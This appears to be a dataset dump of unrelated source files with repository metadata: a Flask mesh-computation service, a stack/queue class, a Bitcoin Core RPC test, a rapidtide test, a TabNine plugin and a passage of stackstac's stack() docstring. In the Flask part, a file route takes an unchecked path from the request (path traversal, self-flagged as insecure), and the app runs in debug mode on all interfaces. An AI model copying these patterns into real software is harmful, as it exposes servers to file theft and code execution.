@app.route('/computePartitionSingleIndividual', methods = [ 'POST'])
def computePartitionSingleIndividual():
pId = request.form['pId']
format = request.form.get('format', 'vtk')
print('pID =', pId, type(pId), file=sys.stderr)
folderPath = pathlib.Path('/tmp') / pId
folderPath.mkdir(parents=True, exist_ok=True)
meshes = {}
#Write files to the tmp folder
print('Format = ', format)
for t in request.files:
print(t)
path = str(folderPath / (pId + '_%3d' % int(t) ) )
request.files[t].save(path + '.' + format)
meshes[t] = path + '.vtk'
utilities.convert_ucd_to_vtk(folderPath, folderPath)
#Do the computations <- Try cellery for a more elegant approach
values = computeRegionalVolumeDynamics.computeEDVEF(meshes)
#Return the computations (so far only the measurements, possibly return also the partitions (for ED and ES))
return jsonify({'outflowEDV' : values[0],'inletEDV' : values[1], 'apicalEDV' : values[2], 'outflowEF' : values[3],'inletEF' : values[4], 'apicalEF' : values[5]})
#For returning files, see https://stackoverflow.com/questions/28568687/download-multiple-csvs-using-flask/41374226
#return send_file(path, as_attachment=True)
@app.route('/testGet', methods = [ 'GET'])
def testGet():
return jsonify({'meow' : 'test'})
@app.route('/getFile', methods = [ 'GET'])
def getFile():
#TODO: this is highly unsecure, check that the parameters are well.
pId = request.form['pId']
fileName = request.form['pId']
path = pathlib.Path('/tmp') / pId / fileName
return send_file(str(path), as_attachment=True)
def test():
path = './Data/Example'
files = os.listdir(path)
meshes = list(map( lambda s: os.path.join(path, s), sorted(files)))
print(computeRegionalVolumeDynamics.computeEDVEF(meshes))
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
| 39.851852
| 165
| 0.681227
|
794b2cb012281b930eee070328c0784a7d017d4d
| 911
|
py
|
Python
|
pworm/data.py
|
emuggie/serverlease-python
|
88999823132fc60b400991b0b9c0a34feeb686ee
|
[
"BSD-3-Clause"
] | null | null | null |
pworm/data.py
|
emuggie/serverlease-python
|
88999823132fc60b400991b0b9c0a34feeb686ee
|
[
"BSD-3-Clause"
] | null | null | null |
pworm/data.py
|
emuggie/serverlease-python
|
88999823132fc60b400991b0b9c0a34feeb686ee
|
[
"BSD-3-Clause"
] | null | null | null |
"""
"""
class Stack :
def __init__(self, max = -1):
self._list = []
self._max = max
def get(self) :
if 0 == len(self._list):
raise IndexError()
return self._list.pop()
def put(self, *values):
if self._max > 0 and self.size() + len(values) > self._max :
raise IndexError()
for value in values :
self._list.append(value)
def peek(self) :
if 0 == len(self._list):
raise IndexError()
return self._list[-1]
def size(self):
return len(self._list)
class Queue(Stack) :
def get(self) :
if 0 == len(self._list):
raise IndexError()
return self._list.pop(0)
def peek(self) :
if 0 == len(self._list):
raise IndexError()
return self._list[0]
def last(self) :
return super().peek()
| 21.186047
| 68
| 0.500549
|
794b2e5e0810f7111fccbab3f1545c92a4498782
| 18,850
|
py
|
Python
|
test/functional/rpc_blockchain.py
|
tryphe/bitcoin
|
da1c0c64fd094880712d1c4167ad9eb3bb6ffcc6
|
[
"MIT"
] | 1
|
2021-08-23T05:28:07.000Z
|
2021-08-23T05:28:07.000Z
|
test/functional/rpc_blockchain.py
|
GoodGooGleINS/bitcoin
|
71797beec54d36a055d5e172ecbf2141fa984428
|
[
"MIT"
] | null | null | null |
test/functional/rpc_blockchain.py
|
GoodGooGleINS/bitcoin
|
71797beec54d36a055d5e172ecbf2141fa984428
|
[
"MIT"
] | 1
|
2021-08-01T02:56:10.000Z
|
2021-08-01T02:56:10.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPCs related to blockchainstate.
Test the following RPCs:
- getblockchaininfo
- getchaintxstats
- gettxoutsetinfo
- getblockheader
- getdifficulty
- getnetworkhashps
- waitforblockheight
- getblock
- getblockhash
- getbestblockhash
- verifychain
Tests correspond to code in rpc/blockchain.cpp.
"""
from decimal import Decimal
import http.client
import os
import subprocess
from test_framework.address import ADDRESS_BCRT1_P2WSH_OP_TRUE
from test_framework.blocktools import (
create_block,
create_coinbase,
TIME_GENESIS_BLOCK,
)
from test_framework.messages import (
CBlockHeader,
from_hex,
msg_block,
)
from test_framework.p2p import P2PInterface
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_greater_than,
assert_greater_than_or_equal,
assert_raises,
assert_raises_rpc_error,
assert_is_hex_string,
assert_is_hash_string,
get_datadir_path,
)
from test_framework.wallet import MiniWallet
HEIGHT = 200 # blocks mined
TIME_RANGE_STEP = 600 # ten-minute steps
TIME_RANGE_MTP = TIME_GENESIS_BLOCK + (HEIGHT - 6) * TIME_RANGE_STEP
TIME_RANGE_END = TIME_GENESIS_BLOCK + HEIGHT * TIME_RANGE_STEP
class BlockchainTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
self.mine_chain()
self.restart_node(0, extra_args=['-stopatheight=207', '-prune=1']) # Set extra args with pruning after rescan is complete
self._test_getblockchaininfo()
self._test_getchaintxstats()
self._test_gettxoutsetinfo()
self._test_getblockheader()
self._test_getdifficulty()
self._test_getnetworkhashps()
self._test_stopatheight()
self._test_waitforblockheight()
self._test_getblock()
assert self.nodes[0].verifychain(4, 0)
def mine_chain(self):
self.log.info(f"Generate {HEIGHT} blocks after the genesis block in ten-minute steps")
for t in range(TIME_GENESIS_BLOCK, TIME_RANGE_END, TIME_RANGE_STEP):
self.nodes[0].setmocktime(t)
self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_P2WSH_OP_TRUE)
assert_equal(self.nodes[0].getblockchaininfo()['blocks'], HEIGHT)
def _test_getblockchaininfo(self):
self.log.info("Test getblockchaininfo")
keys = [
'bestblockhash',
'blocks',
'chain',
'chainwork',
'difficulty',
'headers',
'initialblockdownload',
'mediantime',
'pruned',
'size_on_disk',
'softforks',
'time',
'verificationprogress',
'warnings',
]
res = self.nodes[0].getblockchaininfo()
assert_equal(res['time'], TIME_RANGE_END - TIME_RANGE_STEP)
assert_equal(res['mediantime'], TIME_RANGE_MTP)
# result should have these additional pruning keys if manual pruning is enabled
assert_equal(sorted(res.keys()), sorted(['pruneheight', 'automatic_pruning'] + keys))
# size_on_disk should be > 0
assert_greater_than(res['size_on_disk'], 0)
# pruneheight should be greater or equal to 0
assert_greater_than_or_equal(res['pruneheight'], 0)
# check other pruning fields given that prune=1
assert res['pruned']
assert not res['automatic_pruning']
self.restart_node(0, ['-stopatheight=207'])
res = self.nodes[0].getblockchaininfo()
# should have exact keys
assert_equal(sorted(res.keys()), keys)
self.restart_node(0, ['-stopatheight=207', '-prune=550'])
res = self.nodes[0].getblockchaininfo()
# result should have these additional pruning keys if prune=550
assert_equal(sorted(res.keys()), sorted(['pruneheight', 'automatic_pruning', 'prune_target_size'] + keys))
# check related fields
assert res['pruned']
assert_equal(res['pruneheight'], 0)
assert res['automatic_pruning']
assert_equal(res['prune_target_size'], 576716800)
assert_greater_than(res['size_on_disk'], 0)
assert_equal(res['softforks'], {
'bip34': {'type': 'buried', 'active': False, 'height': 500},
'bip66': {'type': 'buried', 'active': False, 'height': 1251},
'bip65': {'type': 'buried', 'active': False, 'height': 1351},
'csv': {'type': 'buried', 'active': False, 'height': 432},
'segwit': {'type': 'buried', 'active': True, 'height': 0},
'testdummy': {
'type': 'bip9',
'bip9': {
'status': 'started',
'bit': 28,
'start_time': 0,
'timeout': 0x7fffffffffffffff, # testdummy does not have a timeout so is set to the max int64 value
'since': 144,
'statistics': {
'period': 144,
'threshold': 108,
'elapsed': HEIGHT - 143,
'count': HEIGHT - 143,
'possible': True,
},
'min_activation_height': 0,
},
'active': False
},
'taproot': {
'type': 'bip9',
'bip9': {
'status': 'active',
'start_time': -1,
'timeout': 9223372036854775807,
'since': 0,
'min_activation_height': 0,
},
'height': 0,
'active': True
}
})
def _test_getchaintxstats(self):
self.log.info("Test getchaintxstats")
# Test `getchaintxstats` invalid extra parameters
assert_raises_rpc_error(-1, 'getchaintxstats', self.nodes[0].getchaintxstats, 0, '', 0)
# Test `getchaintxstats` invalid `nblocks`
assert_raises_rpc_error(-1, "JSON value is not an integer as expected", self.nodes[0].getchaintxstats, '')
assert_raises_rpc_error(-8, "Invalid block count: should be between 0 and the block's height - 1", self.nodes[0].getchaintxstats, -1)
assert_raises_rpc_error(-8, "Invalid block count: should be between 0 and the block's height - 1", self.nodes[0].getchaintxstats, self.nodes[0].getblockcount())
# Test `getchaintxstats` invalid `blockhash`
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].getchaintxstats, blockhash=0)
assert_raises_rpc_error(-8, "blockhash must be of length 64 (not 1, for '0')", self.nodes[0].getchaintxstats, blockhash='0')
assert_raises_rpc_error(-8, "blockhash must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].getchaintxstats, blockhash='ZZZ0000000000000000000000000000000000000000000000000000000000000')
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].getchaintxstats, blockhash='0000000000000000000000000000000000000000000000000000000000000000')
blockhash = self.nodes[0].getblockhash(HEIGHT)
self.nodes[0].invalidateblock(blockhash)
assert_raises_rpc_error(-8, "Block is not in main chain", self.nodes[0].getchaintxstats, blockhash=blockhash)
self.nodes[0].reconsiderblock(blockhash)
chaintxstats = self.nodes[0].getchaintxstats(nblocks=1)
# 200 txs plus genesis tx
assert_equal(chaintxstats['txcount'], HEIGHT + 1)
# tx rate should be 1 per 10 minutes, or 1/600
# we have to round because of binary math
assert_equal(round(chaintxstats['txrate'] * TIME_RANGE_STEP, 10), Decimal(1))
b1_hash = self.nodes[0].getblockhash(1)
b1 = self.nodes[0].getblock(b1_hash)
b200_hash = self.nodes[0].getblockhash(HEIGHT)
b200 = self.nodes[0].getblock(b200_hash)
time_diff = b200['mediantime'] - b1['mediantime']
chaintxstats = self.nodes[0].getchaintxstats()
assert_equal(chaintxstats['time'], b200['time'])
assert_equal(chaintxstats['txcount'], HEIGHT + 1)
assert_equal(chaintxstats['window_final_block_hash'], b200_hash)
assert_equal(chaintxstats['window_final_block_height'], HEIGHT )
assert_equal(chaintxstats['window_block_count'], HEIGHT - 1)
assert_equal(chaintxstats['window_tx_count'], HEIGHT - 1)
assert_equal(chaintxstats['window_interval'], time_diff)
assert_equal(round(chaintxstats['txrate'] * time_diff, 10), Decimal(HEIGHT - 1))
chaintxstats = self.nodes[0].getchaintxstats(blockhash=b1_hash)
assert_equal(chaintxstats['time'], b1['time'])
assert_equal(chaintxstats['txcount'], 2)
assert_equal(chaintxstats['window_final_block_hash'], b1_hash)
assert_equal(chaintxstats['window_final_block_height'], 1)
assert_equal(chaintxstats['window_block_count'], 0)
assert 'window_tx_count' not in chaintxstats
assert 'window_interval' not in chaintxstats
assert 'txrate' not in chaintxstats
def _test_gettxoutsetinfo(self):
node = self.nodes[0]
res = node.gettxoutsetinfo()
assert_equal(res['total_amount'], Decimal('8725.00000000'))
assert_equal(res['transactions'], HEIGHT)
assert_equal(res['height'], HEIGHT)
assert_equal(res['txouts'], HEIGHT)
assert_equal(res['bogosize'], 16800),
assert_equal(res['bestblock'], node.getblockhash(HEIGHT))
size = res['disk_size']
assert size > 6400
assert size < 64000
assert_equal(len(res['bestblock']), 64)
assert_equal(len(res['hash_serialized_2']), 64)
self.log.info("Test gettxoutsetinfo works for blockchain with just the genesis block")
b1hash = node.getblockhash(1)
node.invalidateblock(b1hash)
res2 = node.gettxoutsetinfo()
assert_equal(res2['transactions'], 0)
assert_equal(res2['total_amount'], Decimal('0'))
assert_equal(res2['height'], 0)
assert_equal(res2['txouts'], 0)
assert_equal(res2['bogosize'], 0),
assert_equal(res2['bestblock'], node.getblockhash(0))
assert_equal(len(res2['hash_serialized_2']), 64)
self.log.info("Test gettxoutsetinfo returns the same result after invalidate/reconsider block")
node.reconsiderblock(b1hash)
res3 = node.gettxoutsetinfo()
# The field 'disk_size' is non-deterministic and can thus not be
# compared between res and res3. Everything else should be the same.
del res['disk_size'], res3['disk_size']
assert_equal(res, res3)
self.log.info("Test gettxoutsetinfo hash_type option")
# Adding hash_type 'hash_serialized_2', which is the default, should
# not change the result.
res4 = node.gettxoutsetinfo(hash_type='hash_serialized_2')
del res4['disk_size']
assert_equal(res, res4)
# hash_type none should not return a UTXO set hash.
res5 = node.gettxoutsetinfo(hash_type='none')
assert 'hash_serialized_2' not in res5
# hash_type muhash should return a different UTXO set hash.
res6 = node.gettxoutsetinfo(hash_type='muhash')
assert 'muhash' in res6
assert(res['hash_serialized_2'] != res6['muhash'])
# muhash should not be returned unless requested.
for r in [res, res2, res3, res4, res5]:
assert 'muhash' not in r
# Unknown hash_type raises an error
assert_raises_rpc_error(-8, "foohash is not a valid hash_type", node.gettxoutsetinfo, "foohash")
def _test_getblockheader(self):
self.log.info("Test getblockheader")
node = self.nodes[0]
assert_raises_rpc_error(-8, "hash must be of length 64 (not 8, for 'nonsense')", node.getblockheader, "nonsense")
assert_raises_rpc_error(-8, "hash must be hexadecimal string (not 'ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844')", node.getblockheader, "ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844")
assert_raises_rpc_error(-5, "Block not found", node.getblockheader, "0cf7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844")
besthash = node.getbestblockhash()
secondbesthash = node.getblockhash(HEIGHT - 1)
header = node.getblockheader(blockhash=besthash)
assert_equal(header['hash'], besthash)
assert_equal(header['height'], HEIGHT)
assert_equal(header['confirmations'], 1)
assert_equal(header['previousblockhash'], secondbesthash)
assert_is_hex_string(header['chainwork'])
assert_equal(header['nTx'], 1)
assert_is_hash_string(header['hash'])
assert_is_hash_string(header['previousblockhash'])
assert_is_hash_string(header['merkleroot'])
assert_is_hash_string(header['bits'], length=None)
assert isinstance(header['time'], int)
assert_equal(header['mediantime'], TIME_RANGE_MTP)
assert isinstance(header['nonce'], int)
assert isinstance(header['version'], int)
assert isinstance(int(header['versionHex'], 16), int)
assert isinstance(header['difficulty'], Decimal)
# Test with verbose=False, which should return the header as hex.
header_hex = node.getblockheader(blockhash=besthash, verbose=False)
assert_is_hex_string(header_hex)
header = from_hex(CBlockHeader(), header_hex)
header.calc_sha256()
assert_equal(header.hash, besthash)
assert 'previousblockhash' not in node.getblockheader(node.getblockhash(0))
assert 'nextblockhash' not in node.getblockheader(node.getbestblockhash())
def _test_getdifficulty(self):
self.log.info("Test getdifficulty")
difficulty = self.nodes[0].getdifficulty()
# 1 hash in 2 should be valid, so difficulty should be 1/2**31
# binary => decimal => binary math is why we do this check
assert abs(difficulty * 2**31 - 1) < 0.0001
def _test_getnetworkhashps(self):
self.log.info("Test getnetworkhashps")
hashes_per_second = self.nodes[0].getnetworkhashps()
# This should be 2 hashes every 10 minutes or 1/300
assert abs(hashes_per_second * 300 - 1) < 0.0001
def _test_stopatheight(self):
self.log.info("Test stopping at height")
assert_equal(self.nodes[0].getblockcount(), HEIGHT)
self.nodes[0].generatetoaddress(6, ADDRESS_BCRT1_P2WSH_OP_TRUE)
assert_equal(self.nodes[0].getblockcount(), HEIGHT + 6)
self.log.debug('Node should not stop at this height')
assert_raises(subprocess.TimeoutExpired, lambda: self.nodes[0].process.wait(timeout=3))
try:
self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_P2WSH_OP_TRUE)
except (ConnectionError, http.client.BadStatusLine):
pass # The node already shut down before response
self.log.debug('Node should stop at this height...')
self.nodes[0].wait_until_stopped()
self.start_node(0)
assert_equal(self.nodes[0].getblockcount(), HEIGHT + 7)
def _test_waitforblockheight(self):
self.log.info("Test waitforblockheight")
node = self.nodes[0]
peer = node.add_p2p_connection(P2PInterface())
current_height = node.getblock(node.getbestblockhash())['height']
# Create a fork somewhere below our current height, invalidate the tip
# of that fork, and then ensure that waitforblockheight still
# works as expected.
#
# (Previously this was broken based on setting
# `rpc/blockchain.cpp:latestblock` incorrectly.)
#
b20hash = node.getblockhash(20)
b20 = node.getblock(b20hash)
def solve_and_send_block(prevhash, height, time):
b = create_block(prevhash, create_coinbase(height), time)
b.solve()
peer.send_and_ping(msg_block(b))
return b
b21f = solve_and_send_block(int(b20hash, 16), 21, b20['time'] + 1)
b22f = solve_and_send_block(b21f.sha256, 22, b21f.nTime + 1)
node.invalidateblock(b22f.hash)
def assert_waitforheight(height, timeout=2):
assert_equal(
node.waitforblockheight(height=height, timeout=timeout)['height'],
current_height)
assert_waitforheight(0)
assert_waitforheight(current_height - 1)
assert_waitforheight(current_height)
assert_waitforheight(current_height + 1)
def _test_getblock(self):
node = self.nodes[0]
miniwallet = MiniWallet(node)
miniwallet.scan_blocks(num=5)
fee_per_byte = Decimal('0.00000010')
fee_per_kb = 1000 * fee_per_byte
miniwallet.send_self_transfer(fee_rate=fee_per_kb, from_node=node)
blockhash = node.generate(1)[0]
self.log.info("Test getblock with verbosity 1 doesn't include fee")
block = node.getblock(blockhash, 1)
assert 'fee' not in block['tx'][1]
self.log.info('Test getblock with verbosity 2 includes expected fee')
block = node.getblock(blockhash, 2)
tx = block['tx'][1]
assert 'fee' in tx
assert_equal(tx['fee'], tx['vsize'] * fee_per_byte)
self.log.info("Test getblock with verbosity 2 still works with pruned Undo data")
datadir = get_datadir_path(self.options.tmpdir, 0)
self.log.info("Test getblock with invalid verbosity type returns proper error message")
assert_raises_rpc_error(-1, "JSON value is not an integer as expected", node.getblock, blockhash, "2")
def move_block_file(old, new):
old_path = os.path.join(datadir, self.chain, 'blocks', old)
new_path = os.path.join(datadir, self.chain, 'blocks', new)
os.rename(old_path, new_path)
# Move instead of deleting so we can restore chain state afterwards
move_block_file('rev00000.dat', 'rev_wrong')
block = node.getblock(blockhash, 2)
assert 'fee' not in block['tx'][1]
# Restore chain state
move_block_file('rev_wrong', 'rev00000.dat')
assert 'previousblockhash' not in node.getblock(node.getblockhash(0))
assert 'nextblockhash' not in node.getblock(node.getbestblockhash())
if __name__ == '__main__':
BlockchainTest().main()
| 41.796009
| 257
| 0.649973
|
794b30f9d5f596015058b0eedfbe781de00ec979
| 1,518
|
py
|
Python
|
rapidtide/tests/test_fullrunhappy_v1.py
|
bbfrederick/rapidtide
|
ddd1899a93fafd550feb134debdd028bbba8c853
|
[
"Apache-2.0"
] | 44
|
2017-01-19T10:12:39.000Z
|
2022-02-08T05:43:58.000Z
|
rapidtide/tests/test_fullrunhappy_v1.py
|
bbfrederick/delaytools
|
190d79ae4c19317dfce38a528e43fd05459f29a5
|
[
"Apache-2.0"
] | 70
|
2018-05-02T14:35:45.000Z
|
2022-03-18T17:43:33.000Z
|
rapidtide/tests/test_fullrunhappy_v1.py
|
bbfrederick/delaytools
|
190d79ae4c19317dfce38a528e43fd05459f29a5
|
[
"Apache-2.0"
] | 12
|
2019-02-12T20:40:27.000Z
|
2021-06-16T13:28:21.000Z
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
#
# Copyright 2016-2021 Blaise Frederick
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import os
import matplotlib as mpl
import rapidtide.workflows.happy as happy_workflow
import rapidtide.workflows.happy_parser as happy_parser
from rapidtide.tests.utils import create_dir, get_examples_path, get_test_temp_path, mse
def test_fullrunhappy_v1(debug=False, display=False):
# run happy
inputargs = [
os.path.join(get_examples_path(), "sub-HAPPYTEST.nii.gz"),
os.path.join(get_examples_path(), "sub-HAPPYTEST.json"),
os.path.join(get_test_temp_path(), "happyout"),
"--mklthreads",
"-1",
"--spatialglm",
"--model",
"model_revised",
"--aliasedcorrelation",
]
happy_workflow.happy_main(happy_parser.process_args(inputargs=inputargs))
def main():
test_fullrunhappy_v1(debug=True, display=True)
if __name__ == "__main__":
mpl.use("TkAgg")
main()
| 29.764706
| 88
| 0.700922
|
794b31c8adfa189efdf1d8599651274f6d8f568e
| 2,045
|
py
|
Python
|
TabNine.py
|
fearoffish/tabnine-sublime
|
8ded738a0713546aa36bd61e36460d335e6e1320
|
[
"MIT"
] | null | null | null |
TabNine.py
|
fearoffish/tabnine-sublime
|
8ded738a0713546aa36bd61e36460d335e6e1320
|
[
"MIT"
] | null | null | null |
TabNine.py
|
fearoffish/tabnine-sublime
|
8ded738a0713546aa36bd61e36460d335e6e1320
|
[
"MIT"
] | null | null | null |
import sublime_plugin
import sublime
import sys
_is_ST3 = int(sublime.version()) >= 3114
if _is_ST3:
# Clear module cache to force reloading all modules of this package.
# See https://github.com/emmetio/sublime-text-plugin/issues/35
prefix = __package__ + "." # don't clear the base package
for module_name in [
module_name
for module_name in sys.modules
if (module_name.startswith(prefix) and module_name != __name__)
or ("json" == module_name)
]:
del sys.modules[module_name]
prefix = None
from .lib.requests import get_capabilities, set_state # noqa E402
from .lib.settings import is_native_auto_complete # noqa E402
capabilities = get_capabilities()
is_v2 = False
if is_native_auto_complete() or (
capabilities["enabled_features"]
and "sublime.new-experience" in capabilities["enabled_features"]
):
is_v2 = True
from .completions.completions_v2 import *
else:
from .completions.completions_v1 import *
class DisableViewCommand(sublime_plugin.TextCommand):
def run(self, edit):
self.view.settings().set("tabnine-disabled", True)
set_state({"State": {"state_type": "disable-view"}})
def is_visible(self, *args):
return is_v2 and not self.view.settings().get("tabnine-disabled", False)
class EnableViewCommand(sublime_plugin.TextCommand):
def run(self, edit):
self.view.settings().set("tabnine-disabled", False)
set_state({"State": {"state_type": "enable-view"}})
def is_visible(self, *args):
return is_v2 and self.view.settings().get("tabnine-disabled", False)
class EnableNativeAutoCompleteCommand(sublime_plugin.TextCommand):
def run(self, edit):
sublime.load_settings("TabNine.sublime-settings").set(
"native_auto_complete", True
)
sublime.save_settings("TabNine.sublime-settings")
sublime_plugin.unload_plugin(__name__)
sublime_plugin.reload_plugin(__name__)
def is_visible(self, *args):
return not is_v2
| 30.984848
| 80
| 0.696333
|
794b33b6d3be04c7903d1da2075c7592d2fecfdf
| 15,111
|
py
|
Python
|
stackstac/stack.py
|
RichardScottOZ/stackstac
|
9e7ba8e76fe0749c3a931adda3e2074dcf8f43d6
|
[
"MIT"
] | null | null | null |
stackstac/stack.py
|
RichardScottOZ/stackstac
|
9e7ba8e76fe0749c3a931adda3e2074dcf8f43d6
|
[
"MIT"
] | null | null | null |
stackstac/stack.py
|
RichardScottOZ/stackstac
|
9e7ba8e76fe0749c3a931adda3e2074dcf8f43d6
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from typing import AbstractSet, List, Literal, Optional, Sequence, Type, Union
import numpy as np
import xarray as xr
import dask
from rasterio.enums import Resampling
from .prepare import prepare_items, to_attrs, to_coords
from .raster_spec import Bbox, IntFloat, Resolutions
from .reader_protocol import Reader
from .rio_env import LayeredEnv
from .rio_reader import AutoParallelRioReader
from .stac_types import ItemCollectionIsh, ItemIsh, items_to_plain
from .to_dask import items_to_dask
def stack(
items: Union[ItemCollectionIsh, ItemIsh],
assets: Optional[Union[List[str], AbstractSet[str]]] = frozenset(
["image/tiff", "image/x.geotiff", "image/vnd.stac.geotiff", "image/jp2"]
),
epsg: Optional[int] = None,
resolution: Optional[Union[IntFloat, Resolutions]] = None,
bounds: Optional[Bbox] = None,
bounds_latlon: Optional[Bbox] = None,
snap_bounds: bool = True,
resampling: Resampling = Resampling.nearest,
chunksize: int = 1024,
dtype: np.dtype = np.dtype("float64"),
fill_value: Optional[Union[int, float]] = np.nan,
rescale: bool = True,
sortby_date: Literal["asc", "desc", False] = "asc",
xy_coords: Literal["center", "topleft", False] = "center",
properties: Union[bool, str, Sequence[str]] = True,
band_coords: bool = True,
gdal_env: Optional[LayeredEnv] = None,
reader: Type[Reader] = AutoParallelRioReader,
) -> xr.DataArray:
"""
Create an `xarray.DataArray` of all the STAC items, reprojected to the same grid and stacked by time.
The DataArray's dimensions will be ``("time", "band", "y", "x")``. It's backed by
a lazy `Dask array <dask.array.Array>`, so you can manipulate it without touching any data.
We'll try to choose the output coordinate reference system, resolution, and bounds
based on the metadata in the STAC items. However, if not all items have the necessary
metadata, or aren't in the same coordinate reference system, you'll have specify these
yourself---``epsg`` and ``resolution`` are the two parameters you'll set most often.
Examples
--------
>>> import stackstac
>>> import satsearch
>>> items = satsearch.Search(...).items()
>>> # Use default CRS, resolution, bounding box, etc.
>>> xr_stack = stackstac.stack(items)
>>>
>>> # Reproject to 100-meter resolution in web mercator
>>> xr_stack = stackstac.stack(items, epsg=3857, resolution=100)
>>>
>>> # Only use specific asset IDs
>>> xr_stack = stackstac.stack(items, assets=["B01", "B03", "B02"])
>>>
>>> # Clip to a custom bounding box
>>> xr_stack = stackstac.stack(items, bounds_latlon=[-106.2, 35.6, -105.6, 36])
>>>
>>> # Turn off all metadata if you don't need it
>>> xr_stack = stackstac.stack(
... items, properties=False, bands_coords=False, xy_coords=False, sortby_date=False
... )
>>>
>>> # Custom dtype and fill_value
>>> xr_stack = stackstac.stack(items, rescale=False, fill_value=0, dtype="uint16")
Note
----
Don't be scared of all the parameters!
Though there are lots of options, you can leave nearly all of them as their defaults.
Parameters
----------
items:
The STAC items to stack. Can be a plain Python list of dicts
following the STAC JSON specification, or objects from
the `satstac <https://github.com/sat-utils/sat-stac>`_ (preferred),
`pystac <https://github.com/stac-utils/pystac>`_, or
`pystac-client <https://github.com/stac-utils/pystac-client>`_
libraries.
assets:
Which asset IDs to use. Any Items missing a particular Asset will return an array
of ``fill_value`` for that Asset. By default, returns all assets with a GeoTIFF
or JPEG2000 ``type``.
If None, all assets are used.
If a list of strings, those asset IDs are used.
If a set, only assets compatible with those mimetypes are used (according to the
``type`` field on each asset). Note that if you give ``assets={"image/tiff"}``,
and the asset ``B1`` has ``type="image/tiff"`` on some items but ``type="image/png"``
on others, then ``B1`` will not be included. Mimetypes structure is respected, so
``image/tiff`` will also match ``image/tiff; application=geotiff``; ``image`` will match
``image/tiff`` and ``image/jp2``, etc. See the `STAC common media types <MT>`_ for ideas.
Note: each asset's data must contain exactly one band. Multi-band assets (like an RGB GeoTIFF)
are not yet supported.
.. _MT: https://github.com/radiantearth/stac-spec/blob/master/best-practices.md#common-media-types-in-stac
epsg:
Reproject into this coordinate reference system, as given by an `EPSG code <http://epsg.io>`_.
If None (default), uses whatever CRS is set on all the items. In this case, all Items/Assets
must have the ``proj:epsg`` field, and it must be the same value for all of them.
resolution:
Output resolution. Careful: this must be given in the output CRS's units!
For example, with ``epsg=4326`` (meaning lat-lon), the units are degrees of
latitude/longitude, not meters. Giving ``resolution=20`` in that case would mean
each pixel is 20ºx20º (probably not what you wanted). You can also give pair of
``(x_resolution, y_resolution)``.
If None (default), we try to calculate each Asset's resolution based on whatever metadata is available,
and pick the minimum of all the resolutions---meaning by default, all data will be upscaled to
match the "finest" or "highest-resolution" Asset.
To estimate resolution, these combinations of fields must be set on each Asset or Item
(in order of preference):
* The ``proj:transform`` and ``proj:epsg`` fields
* The ``proj:shape`` and one of ``proj:bbox`` or ``bbox`` fields
bounds:
Output spatial bounding-box, as a tuple of ``(min_x, min_y, max_x, max_y)``.
This defines the ``(west, south, east, north)`` rectangle the output array will cover.
Values must be in the same coordinate reference system as ``epsg``.
If None (default), the bounding box of all the input items is automatically used.
(This only requires the ``bbox`` field to be set on each Item, which is a required
field in the STAC specification, so only in rare cases will auto-calculating the bounds
fail.) So in most cases, you can leave ``bounds`` as None. You'd only need to set it
when you want to use a custom bounding box.
When ``bounds`` is given, any assets that don't overlap those bounds are dropped.
bounds_latlon:
Same as ``bounds``, but given in degrees (latitude and longitude) for convenience.
Only one of ``bounds`` and ``bounds_latlon`` can be used.
snap_bounds:
Whether to snap the bounds to whole-number intervals of ``resolution`` to prevent
fraction-of-a-pixel offsets. Default: True.
This is equivalent to the ``-tap`` or
`target-align pixels <https://gis.stackexchange.com/questions/165402/how-to-use-tap-in-gdal-rasterize>`_
argument in GDAL.
resampling:
The rasterio resampling method to use when reprojecting or rescaling data to a different CRS or resolution.
Default: ``rasterio.enums.Resampling.nearest``.
chunksize:
The chunksize to use for the spatial component of the Dask array, in pixels.
Default: 1024. Can be given in any format Dask understands for a ``chunks=`` argument,
such as ``1024``, ``(1024, 2048)``, ``15 MB``, etc.
This is basically the "tile size" all your operations will be parallelized over.
Generally, you should use the internal tile size/block size of whatever data
you're accessing (or a multiple of that). For example, if all the assets are in
Cloud-Optimized GeoTIFF files with an internal tilesize of 512, pass ``chunksize=512``.
You want the chunks of the Dask array to align with the internal tiles of the data.
Otherwise, if those grids don't line up, processing one chunk of your Dask array could
require reading many tiles from the data, parts of which will then be thrown out.
Additionally, those same data tiles might need to be re-read (and re-thrown-out)
for a neighboring Dask chunk, which is just as inefficient as it sounds (though setting
a high ``GDAL_CACHEMAX`` via ``gdal_env`` will help keep more data tiles cached,
at the expense of using more memory).
Of course, when reprojecting data to a new grid, the internal tilings of each input
almost certainly won't line up anyway, so some misalignment is inevitable, and not
that big of a deal.
**This is the one parameter we can't pick for you automatically**, because the STAC
specification offers no metadata about the internal tiling of the assets. We'd
have to open the data files to find out, which is very slow. But to make an educated
guess, you should look at ``rasterio.open(url).block_shapes`` for a few sample assets.
The most important thing to avoid is making your ``chunksize`` here *smaller* than
the internal tilesize of the data. If you want small Dask chunks for other reasons,
don't set it here---instead, call ``.chunk`` on the DataArray to re-chunk it.
dtype:
The NumPy data type of the output array. Default: ``float64``. Must be a data type
that's compatible with ``fill_value``. Note that if ``fill_value`` is None, whatever nodata
value is set in each asset's file will be used, so that value needs to be compatible
